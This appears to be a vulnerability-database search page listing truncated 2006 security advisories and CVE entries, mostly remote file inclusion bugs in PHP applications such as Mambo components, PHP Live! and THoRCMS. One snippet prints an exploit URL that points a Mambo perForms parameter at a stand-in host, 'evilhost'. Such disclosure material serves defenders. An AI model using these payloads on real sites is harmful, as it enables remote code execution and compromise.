9470 matches found
PHP Live! 3.2.1 - help.php Remote File Inclusion
PHP Live! 3.2.1 - help.php Remote File Inclusion Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security reserach Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact:...
PHP Live! 3.2.1 - 'help.php' Remote File Inclusion
Advisory: PHPLive 3.2 Remote Injection Vulnerability Release Date: 2006/07/23 Author: magnific Discovered: aneurysm.inc security reserach Risk: High Vendor Status: not contacted | no patch available Vendor Site: www.osicodes.com Contact: aneurysmincathotmaildotcom Version: all ----------- Overvie...
CVE-2006-3798
DeluxeBB 1.07 and earlier exposes a vulnerability where a remote attacker can set the COOKIE data to overwrite the internal variables _GET, _POST, _ENV, and _SERVER during an extract function call, resulting in pollution of the global namespace and potentially multiple security vulnerabilities. A...
Mambo Component pollxt 1.22.07 - Remote File Inclusion
Application : pollxt mambo Component URL : http://www.mamboxt.com Variable $mosConfigabsolutepath not sanitized: xpl works with registerglobals=on in components/compollxt/conf.pollxt.php on line 1-2 requireonce$mosConfigabsolutepath."/administrator/components/compollxt/pollxt.class.php"; Exploit:...
Mambo Component perForms 1.0 - Remote File Inclusion
Mambo Component perForms 1.0 - Remote File Inclusion ------------------------------------------------------------------------ --- perForms founds 12.000 sites ! http://www.vuln.com/components/comperforms/performs.php?mosConfigabsolutepath=http://evilhost Fix Add before code: defined'VALIDMOS' or...
CVE-2006-3615
Phorum 5.1.14 contains multiple PHP remote file inclusion vulnerabilities when register_globals is enabled. The issue allows remote attackers to execute arbitrary PHP code via vectors related to an uninitialized variable. The affected software is Phorum 5.1.14; impact is partial confidentiality, ...
php security update
CentOS Errata and Security Advisory CESA-2006:0568 Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting...
pearl24.txt
Pearl Products Multiple Remote File Inclusion Discovered By zero Moroccan Security Team Affected softwares: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------ PoC...
Echo Security Advisory 2006.36
ECHO.OR.ID ECHOADV36$2006 --------------------------------------------------------------------------- ECHOADV36$2006 ExtCalendar...
CentOS 3 / 4 : SquirrelMail (CESA-2005:595)
An updated squirrelmail package that fixes two security issues is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Updated 04 Aug 2005 The previous SquirrelMail package released with this errata contained a bug which rendered the...
cbsms.txt
--------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team Remote : Yes...
Mambo Module CBSms 1.0 - Remote File Inclusion
Mambo Module CBSms 1.0 - Remote File Inclusion --------------------------------------------------------------------------- CBSMS Mambo Module = 1.0 mosConfigabsolutepath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By...
FSA-018.txt
----------------------------------------------------- Advisory id: FSA:018 Author: Federico Fazzi Date: 15/06/2006, 23:36 Sinthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities Type: low Product: http://www.calendarix.com/ Patch: unavailable...
THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- THoRCMS = 1.3.1 phpbbrootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team...
THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion
--------------------------------------------------------------------------- THoRCMS = 1.3.1 phpbbrootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team Remote : Yes Critical Level :...
CVE-2006-3207
Directory traversal vulnerability in newpost.php in Ultimate PHP Board UPB 1.9.6 and earlier allows remote attackers to overwrite arbitrary files via a .. dot dot sequence and trailing null %00 byte in the id parameter, as demonstrated by injecting a Perl CGI script using "NR" sequences in the...
CVE-2006-3159
pipemaster in Sun ONE/iPlanet Messaging Server 5.2 HotFix 1.16 built May 14 2003 allows local users to read portions of restricted files via a symlink attack on msg.conf in a directory identified by the CONFIGROOT environment variable, which returns the first line of the file in an error message...
CVE-2006-3159
pipemaster in Sun ONE/iPlanet Messaging Server 5.2 HotFix 1.16 built May 14 2003 allows local users to read portions of restricted files via a symlink attack on msg.conf in a directory identified by the CONFIGROOT environment variable, which returns the first line of the file in an error message...
BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities
No description provided by source. --------------------------------------------------------------------------- Grayscale BandSite CMS =rootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Te...
FreeBSD : WebCalendar -- information disclosure vulnerability (09c92f3a-fd49-11da-995c-605724cdf281)
Secunia reports : socsam has discovered a vulnerability in WebCalendar, which can be exploited by malicious people to bypass certain security restrictions and disclose sensitive information. Input passed to the 'includedir' parameter isn't properly verified, before it is used in an 'fopen' call...